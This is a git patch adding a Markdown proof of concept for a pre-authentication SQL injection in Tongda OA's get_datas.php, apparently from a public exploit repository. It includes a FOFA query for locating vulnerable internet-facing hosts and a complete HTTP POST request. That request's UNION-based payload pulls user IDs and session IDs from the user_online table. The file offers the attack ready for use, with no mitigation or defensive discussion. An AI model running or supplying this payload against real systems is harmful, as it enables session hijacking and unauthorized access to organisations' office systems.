From 2e8574a4436904f4e9152ecdf7214143e00c4dcd Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 16 Nov 2023 20:58:41 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E9=80=9A=E8=BE=BEOA=20get=5Fdatas.php?= =?UTF-8?q?=E5=89=8D=E5=8F=B0sql=E6=B3=A8=E5=85=A5.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 通达OA get_datas.php前台sql注入.md | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 通达OA get_datas.php前台sql注入.md diff --git a/通达OA get_datas.php前台sql注入.md b/通达OA get_datas.php前台sql注入.md new file mode 100644 index 0000000..10fd14e --- /dev/null +++ b/通达OA get_datas.php前台sql注入.md @@ -0,0 +1,27 @@ +## 通达OA get_datas.php前台sql注入 + +## fofa +``` +app="TDXK-通达OA" +``` + +## POC +``` + +post /general/reportshop/utils/get_datas.php HTTP/1.1 +Host: {{HostName}} +Accept-Encoding: gzip, deflate +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Length: 2 + +USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 where 1={`\='` 1} union (select uid,sid from user_online where 1\={`=` 1})-- '1** +``` +![image](https://github.com/wy876/POC/assets/139549762/55ba1ee3-215b-4fd2-8c0c-0694a20f6bfd) + +![image](https://github.com/wy876/POC/assets/139549762/3d0399a3-9fe9-46d9-b725-12acb84d422c) + + +## 漏洞来源 +``` +https://forum.butian.net/share/278 +```